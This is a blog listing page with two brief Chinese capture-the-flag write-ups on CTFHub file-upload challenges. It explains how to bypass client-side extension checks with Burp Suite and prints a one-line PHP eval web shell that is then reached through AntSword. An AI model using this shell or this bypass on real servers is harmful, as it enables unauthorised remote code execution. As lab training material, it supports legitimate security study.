![](https://img-blog.csdnimg.cn/20201014180756925.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
CTF-CTFHUB
yuanqiqi_
这个作者很懒,什么都没留下…
展开
-
CTFHUB--web文件上传(前端验证)
1. 查看页面代码可知,文件后缀只能是.jpg、.png或.gif 2. 将文件(文件内容还是一句话木马,不知道可以从无验证那篇文章找)后缀改为.jpg格式(三选一即可)进行上传,同时打开bupsuite进行抓包 Burpsuite抓到的包如下: 3. 将文件名的后缀改为php,后点击forward将包发到服务器,页面显示上传成功 4. 将文件的路径输入到蚁剑中进行连接,找到对应的页面获得flag ...原创 2021-07-08 22:37:27 · 240 阅读 · 0 评论 -
CTFHUB--WEB文件上传(无限制)
上传php文件 php的内容: <?php@eval($_POST['attack']);?> 上传成功后将php文件的路径(头部页面地址+上传文件相对路径)输入蚁剑中进行查询 在文件列表找到提示的页面并打开,就能获得flag ...原创 2021-07-08 19:47:32 · 492 阅读 · 0 评论